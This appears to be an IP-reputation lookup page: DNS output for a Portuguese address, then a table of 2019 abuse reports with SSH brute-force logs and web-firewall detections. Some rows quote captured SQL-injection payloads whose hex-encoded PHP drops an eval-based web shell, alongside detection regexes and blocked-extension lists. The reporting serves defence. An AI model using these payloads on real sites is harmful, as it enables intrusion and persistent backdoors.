城市(city): unknown
省份(region): unknown
国家(country): Portugal
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 109.48.205.121
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 20394
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;109.48.205.121. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025013100 1800 900 604800 86400
;; Query time: 104 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Feb 01 01:33:03 CST 2025
;; MSG SIZE rcvd: 107
121.205.48.109.in-addr.arpa domain name pointer a109-48-205-121.cpe.netcabo.pt.
Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
121.205.48.109.in-addr.arpa name = a109-48-205-121.cpe.netcabo.pt.
Authoritative answers can be found from:
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 207.154.239.128 | attackspam | Jul 16 08:18:07 vibhu-HP-Z238-Microtower-Workstation sshd\[24835\]: Invalid user rabbitmq from 207.154.239.128 Jul 16 08:18:07 vibhu-HP-Z238-Microtower-Workstation sshd\[24835\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=207.154.239.128 Jul 16 08:18:09 vibhu-HP-Z238-Microtower-Workstation sshd\[24835\]: Failed password for invalid user rabbitmq from 207.154.239.128 port 44122 ssh2 Jul 16 08:22:46 vibhu-HP-Z238-Microtower-Workstation sshd\[25729\]: Invalid user samba from 207.154.239.128 Jul 16 08:22:46 vibhu-HP-Z238-Microtower-Workstation sshd\[25729\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=207.154.239.128 ... |
2019-07-16 11:02:41 |
| 23.228.101.194 | attackspambots | PHP Injection Attack: Variables Found
Matched phrase "$_POST" at ARGS:refiles[1].
PHP Injection Attack: High-Risk PHP Function Call Found
Pattern match "(?i)\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:refiles[1].
SQL Injection Attack Detected via libinjection
Matched Data: sc found within REQUEST_HEADERS:Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\x22num\x22;s:288:\x22*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -\x22;s:2:\x22id\x22;s:3:\x22'/*\x22;}
PHP Injection Attack: PHP Open Tag Found
Pattern ma |
2019-07-16 11:06:20 |
| 185.46.171.25 | attackbotsspam | URL file extension is restricted by policy String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. |
2019-07-16 10:54:43 |
| 68.183.190.34 | attack | Jul 16 05:07:45 core01 sshd\[15436\]: Invalid user sh from 68.183.190.34 port 57972 Jul 16 05:07:45 core01 sshd\[15436\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.190.34 ... |
2019-07-16 11:20:40 |
| 49.212.136.218 | attackbotsspam | 16.07.2019 03:14:19 SSH access blocked by firewall |
2019-07-16 11:28:46 |
| 79.248.199.254 | attackspam | Jul 16 05:09:56 lnxweb62 sshd[13311]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=79.248.199.254 |
2019-07-16 11:22:19 |
| 62.4.23.104 | attack | Jul 15 23:05:31 vps200512 sshd\[24712\]: Invalid user somebody from 62.4.23.104 Jul 15 23:05:31 vps200512 sshd\[24712\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=62.4.23.104 Jul 15 23:05:33 vps200512 sshd\[24712\]: Failed password for invalid user somebody from 62.4.23.104 port 46786 ssh2 Jul 15 23:10:17 vps200512 sshd\[24831\]: Invalid user webadmin from 62.4.23.104 Jul 15 23:10:17 vps200512 sshd\[24831\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=62.4.23.104 |
2019-07-16 11:15:42 |
| 66.64.43.162 | attack | masters-of-media.de 66.64.43.162 \[16/Jul/2019:03:39:33 +0200\] "POST /wp-login.php HTTP/1.1" 200 5855 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0" masters-of-media.de 66.64.43.162 \[16/Jul/2019:03:39:36 +0200\] "POST /wp-login.php HTTP/1.1" 200 5810 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0" |
2019-07-16 11:10:20 |
| 118.25.105.88 | attackspam | Restricted File Access Attempt
Matched phrase "wp-config.php" at REQUEST_FILENAME.
PHP Injection Attack: High-Risk PHP Function Name Found
Matched phrase "call_user_func" at ARGS:function.
PHP Injection Attack: Serialized Object Injection
Pattern match "[oOcC]:\\d+:".+?":\\d+:{.*}" at REQUEST_HEADERS:X-Forwarded-For.
SQL Injection Attack Detected via libinjection
Matched Data: sUE1c found within REQUEST_HEADERS:Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:\x22id\x22;s:3:\x22'/*\x22;s:3:\x22num\x22;s:141:\x22*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--\x22;s:4:\x22name\x22;s:3:\x22ads\x22;}554fcae493e564ee0dc75bdf2ebf94ca |
2019-07-16 10:47:11 |
| 138.94.58.11 | attack | MYH,DEF GET /wp-login.php |
2019-07-16 10:52:22 |
| 206.189.137.113 | attackspam | Jul 16 05:14:08 mail sshd[19313]: Invalid user teamspeak from 206.189.137.113 ... |
2019-07-16 11:18:29 |
| 144.76.14.153 | attack | Automatic report - Banned IP Access |
2019-07-16 11:13:37 |
| 120.196.128.42 | attack | Found User-Agent associated with security scanner Matched phrase "zmeu" at REQUEST_HEADERS:User-Agent. Found request filename/argument associated with security scanner Matched phrase "w00tw00t.at.blackhats.romanian.anti-sec" at REQUEST_FILENAME. |
2019-07-16 11:03:03 |
| 167.99.200.84 | attack | 2019-07-16T03:06:35.232299abusebot.cloudsearch.cf sshd\[28199\]: Invalid user caroline from 167.99.200.84 port 59214 2019-07-16T03:06:35.236300abusebot.cloudsearch.cf sshd\[28199\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.99.200.84 |
2019-07-16 11:15:08 |
| 46.165.230.5 | attackspam | Restricted File Access Attempt Matched phrase "wp-config.php" at REQUEST_FILENAME. URL file extension is restricted by policy String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. |
2019-07-16 10:50:50 |